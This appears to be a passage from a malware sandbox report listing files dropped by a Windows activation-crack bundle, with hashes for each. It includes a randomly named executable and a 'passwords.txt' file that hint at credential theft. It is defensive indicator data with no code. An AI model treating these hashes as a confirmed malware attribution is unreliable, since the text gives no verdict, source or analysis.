C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms

MD5 004edc151be054f27529bac1e91075f8
SHA1 b79428ab8a224619f8d8dbae49268ac9406ac6f5
SHA256 c6de9449971090c3afa9a1de1e3e112a5e1b9227f7301b032ceaf9eb1b1e4458
SHA512 8add1453dd69b7a978743e4a2669e5cde159debf307a610ddade599f5d304ea3b5918d0dcc4f2cdfeec2b9dd6ad7fbdd391b1161361dd8fd2969f980b8778c1f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms

MD5 254d4a7871d284c00755874ccf99303b
SHA1 b7ccebafc995ed9b7ff270ff8ef7c0fd85888770
SHA256 959d5c6899d354daccf6ebde5bef5171a6321dd5917ec71a3731c5a59db084ba
SHA512 cd4ed15b4256db8ee913b861fc1f4154bf26afc59a46bb1c2881982642aa5a2fe4362e1ebe61bf6bcb454b67ff375c46650ff9294eaa2c6ccbb44aa9b70635e6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms

MD5 5a612699592c4b55612f9a7564d5e8e7
SHA1 cac3ffac98ac5e78619bbe482fc23749059563a0
SHA256 47393fc6dfadd9d018a95c28b437af71cea1a0036408791d59ce527742c9f486
SHA512 cda713d6376d19b9c50bf617de8a844f4eb0dbb207edfdbf90d29be9cdb6ea9a1b53671b10c3eaa343baf658df298a5bca7165d1ab14ea13091ff2220c363200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 4b0b6942926577bd62e8a23445b245f0
SHA1 4b3e78e94d920c4bf8ee4e199651dd40696934e6
SHA256 1f51eab331bf1c95284b17f583b730a157517123af4e4ecad700007b05aa615e
SHA512 a51377cc34133469f3f31feb55f4709f6922a5cfa0fb948804ccec7029dfbf1af5d101f6684790ace879be7324670d4f011eaa889162ebddaa5de302b48198da

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 bb2c62953a247c5925ef46410778617c
SHA1 d2d479710de7deadb72592d0c041d948c1f2b408
SHA256 37ee58d8565a38240e783268176746e3d3c1f50e54b0aaf4cb8f9d6aaa40afed
SHA512 8fbc4eb4bc73e4ec2502c0d2099f66eb5251753342aaf125f0c41febca12db17e1e3edcda7b74ca2c8bd2c62c258602ab9d1c51278535eb344575ba674f8cec0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms

MD5 a2ebd763803fda481ba8d78904b8e999
SHA1 d08c0e77af6bed634e3344597472015cef44a137
SHA256 26d95c2de97ebfa6b9bd62cc0dc3c7262f19cfa856d94e2d00adedf7c2d44d60
SHA512 8659ed9dbc0dc71552470d53c3bcc6487bbfa201c519cfb1f3b796d810496fb15da646ffe824e244c5ab552041513f9cc0b412e3e2989adbfc4ce759d84d5956

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms

MD5 5528b6d1c60f088625d304690d8296ab
SHA1 e0937bad179bac3e1fff833fefcca453b4d3d0f0
SHA256 2f3210da0d80a3e02f17527da31058509c4612c7ffa94c92276bb6175633ea8a
SHA512 96a5c6521afa4f241be0e88e14a3f5a365293fa45599c1f55b81fddb0e71426bbe0b0026eca196e9c6462c7275dce0a942490c255cee7aa7c32925d3058d9e3d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms

MD5 ad026fb805517c0cf9edda42f6ea4c7d
SHA1 4e788be07124ded88bdc05f5e31b14dea4d47e06
SHA256 f5bfa1cfe94b0470fc8a3ba18019d90f4225c9cbda196c10940e346d7aeb8240
SHA512 8fdec5a61c696db9726f42c3a35a2038131cec5f14bea3cd0c935e9096f2fc55903417aa8753961d838713b7d3ce51ab856974a170228c84ce6b7317a6ac4424

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms

MD5 7ac4a762939afa908557abe7ea3feb4c
SHA1 cec7f1d321f96760861d76b7d81d56a6ae1e3d49
SHA256 c8b53762be3ff5983cbf4b2e1e11b98b9e769f5e1619a0903bae007bab1059fe
SHA512 44fb529102519d4a2fa892228cb63f2f26dfc40a765273e8807d4878571af19b0fd6a9e4de6ae32f11e1a3727053d845b8e20ce01f4a401e096580644c51e80c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 b206c05031dda75f4eafdce12553547a
SHA1 722ac92fc1d39be5afa2e0284ba79305d22090ed
SHA256 3a5d2084ae0b79d4f362049d5eb163264fc8058acb6ffb561f41a648926ab154
SHA512 79d5b6ac6b3036479e268b47a2c7c322d991b596503d45aa16fc2a5289c230968bdabfde6de96a68d987644b09a6a2d7498997d6bcea4c6a1f2134af131cc27e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 0f3f2fee079142ccb1b47b9ce7fa8c27
SHA1 8d1b2331241bf8f950f3135704f0683726844667
SHA256 20935b33839cfecf508eb0750f8f6316ef05691480c97a70749a1259455e036f
SHA512 06b8bdb75a2310b122d39182fbf958d39387c278f5b5e6fb6fda160a058257908665d03ecdf94399c31f482d086057ce4203b18d3c77912b6f9b1c96d01d6d2d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms

MD5 db42bd1f9f070d51f164ebfd4f3b6b73
SHA1 9be4afb376746da087e0213b3a61b9ab5839d3db
SHA256 ff66ec48527685ce2db54495908800ec0bb31c6d215b83e03728f3eae2abdadd
SHA512 7e84c91aef83b60bf8b168d2a5a8d6076a7a8c63c8427b5bd013c37f6a246b19572a3d87b850a15eff2735eaebf5352c6d67afe2e09a236d2887d53a3f81c8f7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms

MD5 7102b57189ffc359989cd5c5dd848c0d
SHA1 4a10f1df5284b1d949ddf5a0f9788b76b6cc8f58
SHA256 4b6eb0b0faa90780658301f26a4b4fcc2ad95ff56dc264c13402c430ae13f48f
SHA512 f745461d584535c40442b2ffa31464efcced05b775f2fc91daa03d1a1747f69570dc107746393067a6e362e7d4ac4f1c201d4cb0c6e54cbefe059f5489a69ccd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms

MD5 93dc4bc22bd90360e47b6bd1731f624d
SHA1 d689a4e74a45625d72888e63258e975f980df4d3
SHA256 6432d968f282257038129ce015ef8295a8e3c35a7ee41ae413ea19543e4a0da5
SHA512 f3961f5e7a4841f6bee60fac693816e006c5c609c74c7162ec5c1a3d1dd83f6e36b63db59a763a6bcc316dd0f8c886ed0fffc7b153c1712aaa4c0704f6ce3c62

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 e4f69b57907917207972fd5caa818231
SHA1 15f72cc0c21de6a39ee6185551b6e5c3e4b37228
SHA256 173c434b9a41aae5353a9b725e6c63c31b29906a08a12324d7bbe504aadbed8e
SHA512 2cc39ec59d17683b6f17b5b25f5588faa2055dc5944d94866410f0ed748bb900c1b088681df6bc224bdb1c9d4daccbf6e1b06afa64bd8f38e62b7801c7cfdea6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MovieMaker-ppdlic.xrm-ms

MD5 3960ef775202d376ecf06dbfeeea30a9
SHA1 51e42ad6bf4b4b2f2bb863e639cfa6d148d16c56
SHA256 417d10de53c9841c0ac9becf0c176e49530a4f1503c117c69684b3c5ff240d8d
SHA512 c37100ebd230808a8fdaab0fa529012d2064e62574aecea69be6d454db24b679d6d8fd01e55e5137b3fec0acb9dc7b562e8fdf5f0ebf003da73c9ccbc953bc1f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\OMD-API-ppdlic.xrm-ms

MD5 ca5077b401e98a144924175e0eb753bf
SHA1 bf402dff736c087309f6697a0f4533cc448bbf2e
SHA256 0db143131f70cdbc66abb3ac82909476b172c09fb1fdf02167e85394d845dbd6
SHA512 4ac543c430634ac02c24914761af064222af86eb0e2d5f550088ea15daf6083f4ff6576ad1a11b08eff816280ad969b05574ddda3dc20ab4871d8c10d67fc271

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms

MD5 9481971cd87bdc78d44d3e83a8554ddb
SHA1 ec2eef49ef452cf6d0c5c29680e362ce714fd79f
SHA256 2947d2d577fbbfc08b0aa803c64da29983fad4351c6f9c24859057d574dbb55c
SHA512 1665cf8e62219a00234ad189261d454d12a75582db96150b7cec7d30dbc6f348b3d02c7ba8f46a898eefb6d3583b2647f4809e586f868a7118f49ec557f03eb1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms

MD5 e91794915e8177dc67df9b4442138a3d
SHA1 ce17317d9ae13218eb636917a3f1f2ba72301c2b
SHA256 d1ada3568ee707984233d710dfe4fd59f9014689b207b183e8d5b4f9300bea2d
SHA512 3f365890e97878509f3c6cdceb8abb32aff28258e78ddd65ee9c6fa381119018b489e27b2815eb2a5a43e8d11044046a92df0e8047516ab53000d72542d2991d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerAdhocMeetings-ppdlic.xrm-ms

MD5 4482158fafcd71a2b32227da1cebb3b1
SHA1 80e462d2f364fff7305ffcfe66735553b584768e
SHA256 39cf9a305c346d102b0517f83453bb74f29a1405890b6050a9dac0cb62d14683
SHA512 1ce6a109f9a2ab016fc7f45abb0e006845a3d737ff515185b0d960bc9d2aef067e6632113392dd68e4cfbb1a5713c680d4a0948fa802380186d2e4924146c0ee

C:\Users\Admin\AppData\Local\Temp\spantmrNwLLubwBl\rVALL3PbDmQZ7Sy2ublu.exe

MD5 a09ef83719952de3da58e3af375af664
SHA1 8cb249125770b65dd0f8e4bc575a9ed9fd64e1dd
SHA256 97767dcc0522540da20c9f3e68de20f75779e326697e1c0e201be9ff57154484
SHA512 0de74d2b7dac3af23680d89da186f495f4eaa3722b7966132e5f2c9cbe7d0f0f80da1c90c0a695fe82c917ad7190fb3696d257d7d3841b4cd7276b2034594fd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\PeerDist-Common-ppdlic.xrm-ms

MD5 307069cb761e8f9d9702679cfdd03424
SHA1 4f764f31aaae768ba23dd90d3f10998630d64be5
SHA256 a3ff40953151990c4be116c37c953f9791a15a45d66b202375fd6bfc79c49767
SHA512 7a0444be3a87261e70e74e2e4ef593c8b3044fa68db96443d900ed21a2dda852e198f7c3fe199f26bbc487d742c9b4f4c5e2c9a581a9c30cddad1d1aa9d10951

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 4c2025b14f08d643aa7465dea0470a03
SHA1 e1cbadeab3952878ea6b82b8afc6c7347d951f68
SHA256 dc11df1c1cadbfc49357abbf476128b5652a9f2880242aa27d7bc98890eaaa9e
SHA512 909f37fb9541990a271ff630a63b65a64211191d891ca72482c8f01eae064a215828a59d4f82c715dec2a2b63b6176a532cd91c4bd05d3054e87aedcbed86cd2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 8e7bf19a3009a50f455906bfe095ecaf
SHA1 96de559c2c951e85655fc46778f0a629e9f1f4d2
SHA256 e66c0de107e1cba37a354098343d4857df21eb67190034bf2953d28708e1b87f
SHA512 d106438fc42d6f1e37b8d813fd8ce5fbf6f38e738454876377694d0e515b9765fe50f48a91bfafca2d1174c1785ef10a09e0ecad06c6d769a36797231cc5e284

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\parentalcontrols-ppdlic.xrm-ms

MD5 98dfc2aeca9e436e0d6c7d90b36d7050
SHA1 001723cbefeb922274e169beee7a388ad34da66d
SHA256 f8ba7bee2bd32d762aa3c0533b829a49ef449acc666634e2d8d815b7d1c973d1
SHA512 be131db0aadbab937f0ed319270dcb9421442375a2ef868f0404ec21176a96f8d4d7ba8c132dffb7f1f0ad1b2e653f3114c9ffea928401615ef78e0b5ebb563b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\NetworkProjection-ppdlic.xrm-ms

MD5 bf30e99805d4c77eb9dff61b46e149b3
SHA1 b3e899cea912a5c02179f7a3a93cfc9fd5581ee5
SHA256 3697a8dba337359c9fb2bd9788601cd25dd45f1e92d3ad0e94093d52daed1f5d
SHA512 bbad965c41af9aa535d7a37917d9213047d44a48cdc31dd901a7413b3ae3b53a2e7169f6d1a990c8a03da365534c974ddd0602cfb9e1e70409329fc5344e143e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\NetworkProjection-ppdlic.xrm-ms

MD5 85cc4685813cf776518084f72b2a3ad0
SHA1 c87b1342cd9f180f8900d9d98c90eee1577fd55f
SHA256 cf2f6215e5dc36ed5257f32f8ed1f874a9769c1c9c3452e0cdb2e6aa3d13eb62
SHA512 93b8a2844375162dfa7c798ee2ef4ba4f424f5c67a72ff3a8d0df0956c51b28b7f020fc39831d76d97f8ea83b3f957561d81a0160b8c4ee5a4aa2a608aedbdd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms

MD5 2c351b9ceca7dea93b4772a3c3eb152d
SHA1 55deaaf89b7bccd62edc04c79102706757fe6eef
SHA256 b51b85509e4a3da50bc88670f52bf49cdf9266fff27b68d31eb7566eb607bb5c
SHA512 1ddaa89f306ba2f9816d91d7b205eb1f687cc1ace07125946f5b73d3a12300d36b742cfdfc6be46114e5a61e1b82dfe3eabd4053cebd1852882c08899ecb9f3c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms

MD5 dcfc82b2b18c7f8fac95243f76f0eff0
SHA1 7081fbd481377f9bb268550355e5d47542a64552
SHA256 3aaf88d0d10da70ee393cbe0a5c66f27e9ba3779a3592cb61c6b8400d605f18f
SHA512 face22677f1e3ff5d5e049a9c85a9cd709027cd6605e544a549e9fa835982ad84473c571297451ecc6b47b6bbb15818118e23b2469378c4d16e8ac8f5223f580

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms

MD5 cce89cfb399eea5263fb314bbe8c2e04
SHA1 9db136e98df10d89112ca18b824e171d38e1374e
SHA256 6fc870783d0beefec80d7e9e224396c49899dfed97d93687cf41175922c7f6b4
SHA512 4a7e0e9ce787c1f053abcec25840d16f018a4fc1756769c2ff6735c25210c05f79a0bfd3fd720ce6fdd49e91a424e8379b4aaae5821eedc91de60ec947fc1bf1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms

MD5 83bf3834593dec83944cec2b4cdd4aea
SHA1 cc729e8be652d32eb9e81dff81b74f2fd43aaecf
SHA256 1c1ae2b67538d878fc33e7eff8a428ddd7c419b3331941ddb8a1c230ef1e9c55
SHA512 bec210e885f3ee4c85e661b465433ad53853d0c3838235afd974cc4305432de63db0f860c571d2bba29795a3173ca3a22b4309e0536ecbca7b9f0e11a6debe3d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms

MD5 ef60ce48d1f50a99a2791bf1e06e98b5
SHA1 b77a4b9554e1db45300a1ba01388c6ad25fb2f47
SHA256 90eae28514fafb03ed6f2ebe481e87a3c79ed585004d217e942819a749489d4a
SHA512 c7e457a94f04d0bbd33a14df658747fc22a5e86326a8fcc394ccd38f6393a6e4cb72a0ddb515be312c3153cde4af5a9ab3b5723192e6409dad9e77734ea5d1cc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms

MD5 1c9da7a2b1f5b7508e519d25cb436116
SHA1 21edc30a83c85b1aa5a0efcce1fb462bb0744fb5
SHA256 a1c723b12e58a2bf29a80f5dd9500a5a9383390d2bd6c9d557a0594bc45da59a
SHA512 7003614f93de3c7b586d3c1381df4f029af2a562097b8c4077ea7beae86da2d1e02818906793c3a58397f9ab6727f8132306d326446cc2dfc07e8a0f1ea73a14

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msac3enc-ppdlic.xrm-ms

MD5 7571b605f7667ea2a9647d79b451254d
SHA1 f839bc40021cf75b67712b563bf73d9f92c98b5b
SHA256 55225242298ec4d5e08444c37c3620188ea9c90712997fa8f100258a2d4fdb40
SHA512 90f999d06b2ce16043f0b66b1980e8352dc464d8fc0eaa0392ff4b0e48460603e53a3275884e12c31bebb3e6496eae079e06271fa0d62d2514d20f0990dec93b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msac3enc-ppdlic.xrm-ms

MD5 e2fc9086299d7a0c61da3ba2fea825ce
SHA1 ebdeab65c9ac48b6b54861352595e633fb2e87be
SHA256 a8be33af4ede70090349d33310c8b5a7fe9e8bee2034c82f8b30724aa2f9263f
SHA512 2cb859077d1919c35953acfc85a98e24661cc211462b98cb77c245ff0e290712ba9cccc9a4ba41661533edd0c13089ab7feab1e1c97a273454a12fa7a0292d3c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms

MD5 2ef9022ba4815e9916a2edf6452d7f65
SHA1 2075105dbfe63966124ca50d90197d0df71080b0
SHA256 5851aae51a4caa8c3a78fbe2c8fc0b449cc636852afe5cc387c0bc0df157fb48
SHA512 ddc20af271f933f2f926bfb8154eba8ca6e26bbc537d650d30c5c1809b758263a9a40f10ebe154a2141e1b41b0007db3bdbbcde8fef1b331afdd1ee2bf34ccf7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms

MD5 78150da47691689042f84d8ab0a8c9f0
SHA1 40a04f083a946e2805b02590833ce8d1c4d386a3
SHA256 e92b09cc9bc9eb194dc003479a90cd8cb8b48b9d04edb370428b3ae9eb99a405
SHA512 905f3cf620c1ed10f29add32871ade55970735b0b0ce63e4cbbfccc9372ba159ee83b55fa5a70cccb2a9d1598ac3f83becffc4522d98d59dbef2718c2c914841

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms

MD5 55b8cd78b187fbaabbfac9b7c782d67b
SHA1 4f82671d1ce83ddf276e290e58489f3a7ab4e46d
SHA256 e7c5bd87dd0f5b5760dfc239a92b7d3bf9de2eeda29d87d3a17bb318b4168300
SHA512 35b763d9d76cc7f3b1d286f567bcd7b3030b57fc056cad12d3f8a10480648da5ff68eaa93057d1e6d6d564b31043b5aaaa3dcdfa92b62aec125cd96aff24037e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 00aaa8cb8fbcb68a272c3b1d5826f88c
SHA1 f7592d84ce0f7bb77aad637c8af27cd3271755c6
SHA256 fda5c8704ec12e4040bd3935cf46d6cb66667109a7abdd090a530d1117594c3f
SHA512 a366696ff53244348f4b2a721e3746942f43420332ba8c7e13845500ae224e4ec77ea3faa7ca070bdaadcd4aabce01cea04a9bebf487f9b80f4b368f497fa804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms

MD5 36ad4eee439e9d02eefe0f2074f47e2c
SHA1 508622c6f2cfa6eea54e696e385b90254c725288
SHA256 3439eff764956c1af8a1778432e492eea427768bb63b0c2a7a220c232ca68a6e
SHA512 54bb1ef29abd2722c5d5e8f4d0428a480160b10f3984bb2e8f2628fbd966faad4bb75aaf282185f9113c1a7705253efce2f31b0870fae2a580a8d0ad34fa491f

C:\Users\Admin\AppData\Local\Temp\jobA3wdsV0dLsYeAY\passwords.txt

MD5 1d80e98de98c570bd4c2ddded1648ebd
SHA1 14684ad6ba66548f4afb57347a511d23f8c520d9
SHA256 4def0fe148088e8134e4e4c18864a3cb1cfe43323048388c3a36c46cec320250
SHA512 a4e6b97fb6ba68afacec008c205a5e8b6c9e888c2eb6a38f9ff0ec7f1dcd2d0bc956562e60f99d480cf724e30df3d2fecb84c7e4061410dcc9e84598e41e3fc8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Personalization-ppdlic.xrm-ms

MD5 bced4fa9373aa95f46ace2f8330ee266
SHA1 4dec0deea10a2a905c0d7bea0e11951bdedff5c7
SHA256 b1590125dd0e2b97bca4826a28f51772469253ea809bf69afe62830b20ae1f69
SHA512 292777e4e73f71bef1f36e7ed86b4f848d86147addb2ddeb4e5c703110cad849ffcb36dd797c2b1d9e35472fb5ce5882f94c2bf4998a7e6e2e8b9f49a97dba8f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 97c82d90ac5c191fa7d25dbb17453a14
SHA1 5eedeab919c07973ad29d28dc73ea274856437ce
SHA256 89ca566d3dc108c9cd13374d6e2bac520807ec5fdd74799f1fcbcb2eec3aae2e
SHA512 4b6edecefd43be3a6029bfb830c212c6575a0f30ccd0810d2fead51ca40b1ecfb7b9be731ecf36a144f5dccd560908a935eb221cfd7b0567fa90d9f14452ffd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 2c29a6d530948477d1b3e2c1fa7e284c
SHA1 90a16d314a050327ea7eb5f36ecf75e9d1cbc2ce
SHA256 73caf41c40168d202625eb50ce40c42bbcd0cd9cd2526f82ed2059a6f0300d68
SHA512 9e5464d57ae66574b9cb070daf34e59cd77652f1abc342f214183864fbafbf08686520408e25b0aa8325daa6b21332fc5425f8ece593a30d9ff3e0616890489f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 006e064bb33f73a6da08c6b3dace55e2
SHA1 f497a9b53369ddb2af9f1247a042e843a3f6d514
SHA256 ca1765057559b80f8aeb738bf4743741ced4c9cf94e6c459ab84a30f0ebdc205
SHA512 e0ec0626623073c577c83fc5cbc1e7436a8442e95f1c93b96d79c4a463ee459d16551460a92ce300d6cdf744256dd2dd98c268d84bf6791e33a18e5ae9c6f9db

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 da8a60a14b7b3d2907cb85f04819677c
SHA1 042c71c67dd3b57232ecef1d10d45486cf16f625
SHA256 352d44c7ebe115034c6901c721d3d6ce9250b1af4d114a6ac7c76c8ae864a8d1
SHA512 33a4ba18e48b957148dd182d11780acce76d137250c591cfa2bcc05d4a3a65e6ea89b829e4ad3299f1db59f53e292a09e6bec83fcf5df72b4d2c9e8611027bb8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 a6c2758212303295e180ad70fb520d71
SHA1 0b9d1c4d4ddcd1347dd8684b77704d865ae43df6
SHA256 82e1ca366e969266c53ff662ab57d05ad32a3c85367c85431088df62bb2c5af5
SHA512 e7c2eb91882abc7e9d6f3f8bf28a394dad24568fbb08b79f4e1b7bcfe89663565b4274d2faabed7a768af4d3ffe9c20e8710571caec9a7a53cb62c602b566a19

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 05961d56f79189704ea9207bfdaea410
SHA1 d07843dfc50825d058b7e9092d0b892e51ca6a2f
SHA256 e88a32b7a8341a485e9ac481c72039874ac81d14a23ee95db7b49c6990b1de27
SHA512 7a9c2f2e6a8cc76ffd57c246c58a2bb539a1521bcd04f6be85a50f128e22ad3675d22f1e02bbced5cbd11c16ef7e020a519b59a19ced83a24f57ffee3b3d2fdd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 a30b7723a419324978d6dc3b770159f9
SHA1 0e929af2e93aab7855dac3faadfca8157d70dc69
SHA256 b719bff57185e7a17038e08e38f9dcd8f7b0f40ed94e0c59513fba2fd9845cf3
SHA512 18fdf625b6e4a9538ab0193f587119e926dc37a92f270bfb6e9168115c3c953150c0512aafd42e910427e7cedd94687886a89e3d92c47161d1c35f6823b785c5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 fec8778c37d9bb722af4ea788ddcf5f4
SHA1 77d1f28c33706148d9a302dc2fadc9099257a72a
SHA256 92b9992e551df53800081ade8184034fed5b41ec3e6795f8d91042c6604c847a
SHA512 64ae7b996d348bb23c7c6d3503f1c71b032c86a6b26794cb4b3fd18b01cb9f09e0439cca3a33ef48dafdf10bcf96c0c9556e8ae9fab26ec464a8f42dbf31d58b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms

MD5 cd75b066cd6327ba7962cd3bfb6b1cff
SHA1 e06bf103d126518e06bfebaa3f127d9a6b258b00
SHA256 2b05d5533faa9a5e621eba4b6d75e719a0e066920ae055215f61db6facdc0743
SHA512 1a21534251f145a1f289b6b1b1c714e911f80983283c9a56a3997b5154f6b42d97cd3f127f852789d6e61fe02e8d655dd3f660f852c616e5469143b5f65762d0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\RasBase-ppdlic.xrm-ms

MD5 d35ede3c39d33b456bb69bf64e84ba0e
SHA1 84826fdb907c0c4df442c427d2d7b2e8c2a236d4
SHA256 8955949921543758dd86948927a29ca3a8f700164e108d9e19c34eefb94dccd7
SHA512 ea8c257e3e656aa9f787208762bc8e8cbc1697dea50e531a84dfa4e4151ec228720169ccee674f57a00dfb0bd9e08481ca43586d2213aa406a602d26a2e2c7bb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\RasBase-ppdlic.xrm-ms

MD5 cd898c26a1cb093c762dd5f4b4429bbb
SHA1 cb9bdf3991b099a15767318b8db19887d5cc7a18
SHA256 e0634f088316c0f2e00fd9ca67d846cc085ff6561f5cc5b63ccb348f18435109
SHA512 e8e3242e7f13ba657c6ec30277b012f0eeb423677e31e16656eeee5d8d97c05a466f0393f7cf99e6dcc3c0a426c2cde0c8f6fccc1c2bfe8f55d525f2b0c96b22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Security-Licensing-SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 ea4c9e3d065289f99b75cca7e65ec0c5
SHA1 e377f9227b35dff577da363d102603ed6e5c445e
SHA256 f7a778f16aa72e03c588582fd6b28a0d9fb4969fce083ccf4c2d8f38dba924e1
